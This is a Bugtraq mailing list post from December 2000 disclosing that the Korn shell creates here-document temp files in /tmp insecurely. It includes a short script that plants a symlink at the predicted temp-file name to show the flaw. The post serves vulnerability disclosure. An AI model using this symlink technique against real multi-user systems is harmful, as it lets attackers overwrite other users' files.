Bugtraq mailing list archives

/bin/ksh creates insecure tmp files

From: Paul Szabo <psz () MATHS USYD EDU AU>
Date: Thu, 21 Dec 2000 09:11:37 +1100

Recently I reported that, similarly to the recently discussed tcsh
vulnerability, the Bourne shell /bin/sh creates temporary files in an
insecure way:

  http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au

At the time I also tested the Korn shell ksh, and it seemed safe... but no,
ksh is in fact also vulnerable. (Is this all shells? We have seen tcsh,
bash, sh and now ksh fail...)

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

Current thread:

/bin/ksh creates insecure tmp files Paul Szabo (Dec 20)
- Re: /bin/ksh creates insecure tmp files J.A. Gutierrez (Dec 21)
- Re: /bin/ksh creates insecure tmp files Greg A. Woods (Dec 21)